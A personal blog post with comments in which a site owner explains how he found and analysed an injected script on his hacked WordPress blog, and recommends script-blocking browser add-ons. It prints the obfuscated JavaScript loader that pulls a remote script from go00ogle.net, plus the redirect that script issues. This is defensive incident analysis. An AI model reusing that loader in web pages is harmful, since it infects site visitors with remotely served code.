Being web-cracked: experience and advice

Has your web site ever been “infected”?

This happened to me today, for the first time in my life. Hello from go00ogle.net. Below are technical details on what exactly happened, why I did not suffer any damage, and what I recommend doing in order to reduce your own susceptibility. The article is written for a non-technical reader.

How did I see that something was wrong?

(Image: go00ogle.net blocked by NoScript)

Administering another blog of mine today, I noticed something in my web browser which I had not seen before: the icon of NoScript (a Firefox add-on) was showing that some scripts were blocked from execution. That is the small blue “S” with an even smaller red circle in the Firefox information bar, shown in the picture to the left.

NoScript stops the browser from executing scripts, which are parts of the web pages we are browsing. It is a common practice nowadays to call scripts from hosts other than the one where the web page itself is hosted. NoScript blocks such calls by default and shows the red icon. Click it, and you see which hosts the web page has tried to call. I had whitelisted my own host shemyak.com, but I knew for sure that my blog should not call any scripts from a host such as go00ogle.net.

This is an indication that my host is doing something I did not ask it to.

How did I find out what it was?

(Image: go00ogle.net blocked by AdBlock)

The easiest thing nowadays is to type the question into a search engine. Google.com does not (at the moment of this writing) show anything helpful about go00ogle.net, except a couple of links to forums where the latter is called a scam site. But “Google Safe Browsing” itself identifies the almost-namesake as “suspicious”, and claims it “has hosted malicious software” as of 15.6.2009 (yesterday). Not much real information, at least yet.

Let’s look into the source ourselves. The source of my “problematic” page does not contain the string “go00ogle” anywhere. So the call to this site is made from some other script, called by this page.

Their locations can be found in the page source, but it’s even easier with another security and privacy tool, AdBlock. Its window shows a list of all “items” on the page – images, styles, scripts and embedded objects. Cool, I see the script about which NoScript informed me, and also two other scripts which were always there.

Which of the two is the source of the problem? Thanks to AdBlock, I can just block them one by one and see whether NoScript still complains about blocking go00ogle.net. It turns out that the second one is “infected”, the first is not.

Let’s now explore “the bad” script. I copy its location and download it with wget:

$ wget -O infected-script 'http://www.konstantin.shemyak.com/dnevnik/wp-admin/load-scripts.php?c=0&load=jquery,utils,quicktags&ver=b64ae9a301a545332f1fcd4c6c5351b4'

And open it with a text editor. The suspect is there! Here is the piece of code “calling home”, on line 20:

jQuery.noConflict();function advQuery(){var Host="http://google.com/";Track="/if.php";get=unescape("%6E%65%74");document.write(unescape("%3Cscript src='"+Host.substr(0,9)+unescape("\u0030\u0030")+Host.substr(9,5)+get));document.write(unescape(Track+"' type='text/javascript'%3E%3C/script%3E"));};advQuery();

The URL go00ogle.net is obfuscated: it is glued together from two pieces of the harmless-looking string “http://google.com/”, with “00” inserted between them and “net” (hidden as “%6E%65%74”) appended (I do not see a reason why the author of this script took the time to do it). The result of the execution is that the browser gets the following instruction:

<script src="http://go00ogle.net/if.php">

And the default behavior of the browser would be to execute this script. Good that NoScript changes it.

What could happen if I had not used the prevention measures?

Let’s see what is inside that go00ogle.net/if.php:

document.write("<script type=\"text/javascript\" src=\"http://www.trafing.net/show-banner.php?kod=954815&site=www.surinamefoto.com\"></script>");

So it’s a redirect to another script. It may also roll up a counter for “surinamefoto.com”. Unwrapping what comes from trafing.net, I saw two more redirects, again with possible roll-ups of counters. I lost interest in hunting it down further and a) submitted a support ticket to my hosting provider, b) informed the WordPress community about the issue (I was not the first victim there).

Conclusion:

(Image: NoScript logo)

It’s that simple. Just use tools like AdBlock and NoScript. The first is a “blacklist”-type filter (specifically prohibiting items which you know you do not want – works great for advertising banners and counters you do not need), the second is a “whitelist” (prohibiting by default everything except items you have explicitly allowed). By default, your browser may be executing any code – even code coming from places you never asked for. This is probably not a good idea, so do not use a web browser in which you can’t easily disable this insecure behavior.

9 thoughts on “Being web-cracked: experience and advice”

  1. wget -O infected-script 'http://www.konstantin.shemyak.com/dnevnik/wp-admin/load-scripts.php?c=0&load=jquery,utils,quicktags&ver=b64ae9a301a545332f1fcd4c6c5351b4'

    Hm. But the key question is how this script was infected? How was the attacker able to add his stuff into the page which is hosted by your server?

    • Exactly. The responsibility division between me and the provider is not absolutely clear, as this is their “automatic install”, but I did a number of customizations to it. Well, backups are made, stay tuned 🙂

  2. I got news for you!

    Your site is still trying to infect visitors.

    It’s trying to deliver a malicious Adobe Acrobat file. Luckily I had JavaScript turned off in Acrobat.

    Many of these infections have been the result of a virus/trojan on the PC used to update the website. We’ve had the best luck in finding and eradicating these PC infections with a combination of AVG and Malwarebytes.

    According to our scanners, blog/index.html is also infected.

    Do you have the log files for your site? Do you see any FTP activity that is not yours?

    In the log files do you see any POSTs with strange query strings?

    If you get nowhere with your hosting provider, please contact me off-list and we’ll help you. We help out a lot on http://www.badwarebusters.org

    Good luck!

    • @Thomas, thank you. I think I’ve cleaned up the malicious code now, and it’s true that during some time period this site was spreading the scam! Digging the logs now…

  3. Strictly speaking, NoScript is absolutely The Must for Web surfing. Some time ago my browser (both IE and Firefox) cache contained at least several pieces of dangerous junk – trojans, rootkits, etc. Everything has been clear since NoScript was installed. Yes, it imposes some inconvenience. But just a little, and almost incomparable with the possible harm.
    One could say – antivirus is the solution. Well, but remember – illness goes first, the cure – later. And there is a time leap when your infection won’t be known and detected.

    • illness goes first, the cure – later
      Or even better: prevention is easier than cure 🙂

  4. Mine comes back every day even after I remove the code. I’m starting to suspect the database, as the files do not have modify dates. Has it come back for you? Did you do anything other than what is listed above in this article you wrote? I’m on DH too.

    • Hi Lunesse,
      Nope, I have not done anything to actually close the entry point. That’s because I was not able to find it. I removed the infected code from the web pages and also found a file in my home directory on the provider’s server which was likely used for the exploit. Got no idea on how it appeared there. Removed that one too, and the exploit does not seem to come back. I realize that the hole is most likely still open 🙁
